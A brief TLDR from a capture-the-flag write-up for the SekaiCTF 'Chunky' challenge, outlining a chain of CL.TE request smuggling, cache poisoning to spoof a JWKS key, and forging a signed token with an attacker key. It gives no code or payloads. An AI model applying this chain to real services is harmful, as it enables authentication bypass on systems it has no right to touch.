Detailed Writeup: https://fireshellsecurity.team/sekaictf-frog-waf-and-chunky/#challenge-chunky-16-solves

TLDR

• Request Smuggling from Cache to nginx (CLTE)
• Cache Poisoning to JWKS Spoofing
  • Attacker public-key in a post cached as JWKS public URL
• Sign Authorization token with attacker private-key to get flag

Original writeup (https://fireshellsecurity.team/sekaictf-frog-waf-and-chunky/#challenge-chunky-16-solves).